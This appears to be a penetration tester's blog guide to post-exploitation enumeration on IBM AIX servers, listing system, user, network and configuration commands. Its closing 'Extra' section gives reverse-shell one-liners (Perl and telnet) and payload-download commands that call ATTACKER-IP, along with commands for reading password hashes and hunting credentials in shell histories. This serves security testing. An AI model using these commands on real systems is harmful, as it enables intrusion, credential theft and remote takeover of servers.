Background:

On a recent internal pentesting engagement I managed to get an unprivileged shell on one of my client’s servers. It was a business critical server so enumerating it and rooting it was the next logical move to make.

I always begin my enumeration by running the “uname -a” command to get some basic system information; funny thing though, this time around I had no idea what some of the output meant.

This was my first encounter with privilege escalation on AIX and I was pretty surprised by how little information I found online on enumerating AIX systems. Most of the post-exploitation guides/posts I read only mentioned where the user password hash file is stored (/etc/security/passwd) since it’s different from the regular location (/etc/shadow). But after I spent a little time aimlessly running commands that kept failing, I quickly realised that this wasn’t the only difference between AIX and other Unix systems.

It took me a little time going through various AIX system administration guides and command cheatsheets (links at the bottom of the post) and putting together a list of various post-exploitation techniques to use on the box. I decided to put this blog-post up with the hope that it will one day help another clueless pentester/red teamer.

AIX:

AIX (Advanced Interactive eXecutive) is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms. AIX is an enterprise-class OS so it tends to be preferred by large organisations like banks, governments, insurance companies, power stations and universities.

AIX’s default shell was Bourne shell (/bin/sh) up to AIX version 3, but was changed to Korn shell (/bin/ksh). The most recent version of AIX at the time of writing is AIX 7.2.

I should make it clear that majority of the basic Unix commands will work on AIX systems; navigation, directory listing, process listing, file manipulation, searching and grepping etc. You’re not going to have to relearn Unix administration from scratch. But there are some tricks you may want to add to your arsenal if you want to adequately enumerate an AIX server.

AIX Enumeration:

There are already plenty of great Linux post-exploitation guides on the web (links at the bottom of the post) and a lot of the enumeration techniques in them will work on AIX. So I’m going to try as much as possible not to reinvent the wheel, there will be a little repetition of basic/familiar commands but I’ll do my best to keep it to a minimum.

I like to split my system enumeration into 7 general sections, so this is what I’ll use to structure this post:

System Info Users & Groups Drives & Shares Network Info Process Info Software/Packages Config & Miscellaneous

UPDATE: I’ve created a GitHub repo with all the enumeration tips below. You can find the repo here:

https://github.com/V1V1/AIX-for-Penetration-Testers

1. System Info:

Command Purpose Comments prtconf Prints system configuration. This will give you a significant amount of information about the system; architecture, processor and memory information, network information, storage information etc.

This is probably the first command you should run on AIX systems since it will give you a lot of useful information about the server. uname -a Prints the OS name, hostname, release number of the operating system, operating system version and machine ID. - uname -x Prints the information specified with the ‘-a’ flag as well as the LAN network number, as specified by the ‘-l’ flag. - uname -M Prints the system model. - uname -u Displays the system ID/serial number. - oslevel -s Prints AIX version information. Sample output:

6100-07-05-1228



The first four digits are the major release e.g. AIX 6.1

The next two digits denote the TL (Technology Level) e.g. TL07

The third set of digits are the SP (Service Pack) e.g. SP05

The final four digits are the (US format) date of this release e.g. 28th December lscfg -p Prints list of all installed resources. - lsdev -C | sort -d Prints list of all hardware attached to the server. - lssrc -a Prints list of all system resources on the server. -

2. Users & Groups:

Command Purpose Comments id Prints current user’s details and group information. - who -a / w / last -a Prints information about logged in users. - cat /etc/passwd Prints list of all users. - lsuser ALL Prints list of all users and their attributes. - cat /etc/group Prints list of all groups. - lsgroup ALL Prints list of all groups and their attributes (including members). - cat /etc/security/passwd Prints list of all user’s password hashes (requires root). AIX password hashes aren’t stored in a similar format to other Unix systems. More on this later.

AIX User Management:

If you manage to get access to an account with user management privileges, this section might come in handy:

Unix Command AIX Command Purpose useradd mkuser Create a user. usermod chuser Modify a user. userdel rmuser Delete a user. usermod -s chsh OR passwd -s Change a user’s shell. passwd -l chuser login=false Lock a user’s account.

3. Drives & Shares:

Command Purpose Comments lspv Prints list of disks on the server. Sample output:

hdisk1 004ce4cf0ff6d5c6 rootvg active

hdisk2 00c9b8fa3120beb9 datavg active



In this example the system has 2 physical disks and they are assigned to 2 Volume Groups (rootvg and datavg).

Every AIX system has a “rootvg” as this is where AIX is installed and the system is booted from. lspv hdisk0 Prints information about a specified hard disk - lsvg Prints a list of all volume groups. A VG (Volume Group) is a local disk which can consist of one or more disks or LUNs (logical unit number).



VGs enable files to be spread across multiple disks (aka Physical Volumes or PVs). lsvg -l rootvg Prints information about a specified volume group. - mount Prints information about all mounted filesystems. - df -k / df -h Prints mounted filesystem information; disk usage, mount location etc. - lsps -a Prints paging space information. - lslpp -L | grep nfs Verifies if NFS is installed. - lssrc -g nfs | grep active Check NFS/NIS status. - cat /etc/xtab Checks to see if it is an NFS server and what directories are exported. - showmount Show hosts that export NFS directories. - showmount –e Show what directories are exported. -

4. Network Info:

Command Purpose Comments ifconfig -a Prints information about the server’s network interfaces. - lsdev -Cc if Prints hardware information about the server's network interfaces. - netstat -i Prints a table of all network interfaces. - netstat -nr Prints the server’s routing table. - arp -a Prints the server’s arp table. - namerslv -Is Prints a list of all the nameservers the server has access to. - hostent -S Prints a list of all host entries on the server. - grep 80 /etc/services Prints information about a specified running service. -

5. Process Info:

Command Purpose Comments ps aux Prints running process information. - who -p /var/adm/wtmp Prints the processes from users logged into the server. -

6. Software/Packages:

Command Purpose Comments echo $PATH Prints the current user’s path/environment. - whereis ‘program’ Locates a specified program on the server. - which ‘program’ Locates a specified program on the server (will only search the current user’s path/environment). - lslpp -L Prints a list of the server’s software inventory. - lslpp -h Prints a list of the server’s software history. - lslpp -L | grep ‘program’ Searches the server’s software inventory for a specific program. - rpm -qa Prints a list of all installed rpm packages. - rpm -qa | grep 'package' Searches for a specific program in all installed rpm packages. - ls -l /usr/bin /usr/bin directory listing. -

7. Config & Miscellaneous:

Before I get into this section, I’ll mention that there is no exhaustive guide to enumerating every server’s configuration since this is completely dynamic and will vary based on the environment and the respective system’s purpose. The post-exploitation guides at the bottom of this post have a long list of techniques that you will help you out in this phase. That said, I’ll summarise some general strategies that may come in handy.

Target Strategies Sample commands Configuration files Like most Unix systems, AIX has a ‘/etc’ directory where you’re likely to find lots of configuration files, so take your time going through it.

Search individual user’s home directories for configuration directories/files e.g. the ‘.ssh’ folder.

Also search additional/3rd party software directories and files. AIX is often used for sensitive applications such as core banking systems and you may be fortunate enough to find gems like hard-coded database passwords in these files. ls -l /etc



ls -lR /etc/ | grep "conf"



ls -lR /path/to/somewhere/ | grep "config" User activity Show me your shell history and I’ll show you who you are.

A user’s history can often reveal a lot of sensitive information. I’ve often come across admin’s echoing passwords into commands to avoid inputting them in interactive prompts.

Search home folders and other directories for scripts written by server admins, these can occasionally be gold mines. cat /home/USER/.sh_history



cat /home/USER/.vi_history



cat /home/USER/.profile



grep ^sh /home/*/.*hist*



grep ^ssh /home/*/.*hist*



grep ^telnet /home/*/.*hist*



ls -lR /path/to/somewhere/ | grep "\.sh" Cron jobs Cron allows admins to schedule tasks to run any hour of the day or night, making regular upkeep a breeze.

Customs scripts specified in cron jobs can often contain sensitive information like passwords. crontab -l



cat /var/spool/cron/crontabs



cat /var/adm/cron/log



cat /var/adm/cron/cron.deny



cat /var/adm/cron/cron.allow Logs Log files can occasionally contain sensitive information.

AIX has various directories you should search for potentially sensitive log files.

You can also use the ‘alog’ utility to view specific logs.

AIX also comes with the ‘errpt’ utility which you can use to generate error reports from entries in an error log. You can read more about its usage here. ls /var/log/



ls /var/adm



cat /var/log/messages



cat /var/adm/messages



cat /var/adm/ras/errlog



alog -L

#List all available logs



alog -o -t LOG

#Views a specific log e.g. to view the boot log; alog -o -t boot



errpt | head

#View most recent error log entries Archive files Archive files are often used to backup data and you may come across archive files which contain sensitive information (e.g. application passwords, configuration files, ssh keys and databases).

Use find to discover archive files (e.g. .tar, .gz, .a)

AIX libraries with the “.a” extension are ‘ar’ compressed files.

ar is a compressing utility of archive files. The tool is installed by default on AIX. ls -lR /path/to/somewhere/ | grep "\.tar"



ls -lR /path/to/somewhere/ | grep "\.gz"



ls -lR /path/to/somewhere/ | grep "\.a" “Interesting” files Again, this varies significantly depending on the server’s purpose.

The ‘find’ command works on AIX, so the options here are limitless.



Some general strategies:

Review all SUID/SGID/SETUID/SETGID files.

Search and grep for files with interesting string e.g. password.

Search the ‘/tmp’ directory. find / -user root -perm -4000 -print 2>/dev/null



find / -perm -1000 -print 2>/dev/null



find / -perm -2000 -print 2>/dev/null



find / -perm -3000 -print 2>/dev/null



grep -rnw /path/to/somewhere/ -e "password"



ls -la /tmp

Extra:

This section was a bit of an afterthought but I decided to throw it in anyway. It’s basically a few techniques involving default AIX packages/services that you may find useful at various stages of your assessment.

1. Exploitation – getting your initial foothold:

The attack vectors available to you will completely depend on the server’s configuration and running services. You MAY find some of the services listed below running on AIX servers.

Port Service Attack Vector 21 FTP Brute force.



Metasploit module:

auxiliary/scanner/ftp/ftp_login 22 SSH Brute force.



Metasploit module:

auxiliary/scanner/ssh/ssh_login 23 Telnet Brute force.



Metasploit module:

auxiliary/scanner/telnet/telnet_login 512 rexec Brute force.



Metasploit module:

auxiliary/scanner/rservices/rexec_login 513 rlogin Brute force.

Metasploit module:

auxiliary/scanner/rservices/rlogin_login 80, 443 and countless others; this will vary depending on what additional software is installed on the server. Web Default passwords, brute force, shell uploads (WAR, jsp) etc.

2. Reverse shells:

So you have command execution and want to level up and get a reverse shell? Setup a listener and try a few of the commands below.



Software/Package Command Perl /usr/bin/perl -e 'use Socket;$i="ATTACKER-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");}; Telnet telnet ATTACKER-IP 80 | /bin/sh | LOCAL-IP 44445 Telnet telnet ATTACKING-IP 80 | /bin/sh | telnet ATTACKING-IP 443



NOTE: Remember to listen on both port 80 & 443.

3. TTY shells:

As is often the case, you may have found yourself in a restricted non-tty shell that limits your options when interacting with the server. Here are some tty shell spawns to try out.

Software/Package Command /bin/sh /bin/sh -i Perl perl -e 'exec "/bin/sh";' Perl perl: exec "/bin/sh";

4. File downloads:

At some point during your post-exploitation, you’re probably going to want to download a file like a privilege escalation exploit onto the server. Default AIX installations are missing a lot of the basic utilities you’re likely to come across on other Unix systems. The server I was on didn’t have wget, curl or nc installed. Admins may install some of them as additional utilities, but it’s safer to assume you won’t find any of them on the box.

Fortunately, there are some default programs installed on AIX that can aid you with file downloads.

Software/Package Command FTP ftp ATTACKER-IP



Input username & password

get FILE

exit SCP scp ATTACKER-USER@ATTACKER-IP:/path/to/remote/FILE /path/to/local/FILE Telnet (echo 'GET /FILE'; echo ""; sleep 1; ) | telnet ATTACKER-IP 80 > FILE'



NOTE: This command will also record some unnecessary telnet command output at the top of the downloaded file which could affect execution if it’s a shell script. You can use tail to strip this unnecessary output:



tail -n +6 FILE > FILE2 Perl echo '#!/usr/bin/perl' > downloader.pl && echo 'use LWP::Simple; getstore("http://ATTACKER-IP:80/FILE", "FILE");' >> downloader.pl && perl downloader.pl Perl lwp-download http://ATTACKER-IP/FILE



NOTE: lwp-download usually comes packaged with Perl.

5. Privilege Escalation:

IBM is quite proud of AIX’s security reputation, with good reason too; there aren’t a lot of exploits out there for their product. Good news is that Offensive Security’s Exploit Database does have a number of privilege escalation exploits for various versions of AIX that you may find useful.

6. Cracking AIX passwords:

AIX’s user password hashes are stored in the ‘/etc/security/passwd’ file. I had mentioned earlier that these hashes aren’t stored in a format similar to other Unix systems. Hashcat does have support for various hashing mechanisms used by AIX systems, you can find some example hashes here (search for AIX).



I also found a Metasploit module that uses John the Ripper to identify weak passwords acquired from AIX systems, but I haven’t tried this out yet. I’ll be sure to update this post when I do.

Summary:

Like I said at the beginning, I wrote this post because I was desperately looking for something like it when I was starting my AIX post-exploitation. It’s not a comprehensive guide to AIX/Unix enumeration, but with any luck it may come to the aid of another despairing internet adventurer in the future. If it helps just one person, then it’s served its purpose. Happy hunting.

References:

I went through some incredibly informative material that helped me out both during my engagement (yes, I did root the server 🙂 ) and the writing of this post.

1. Linux Post Exploitation:

2. AIX Sysadmin Guides & Cheatsheets:

3. Breaking AIX:

4. Securing AIX – because I love blue teamers 😉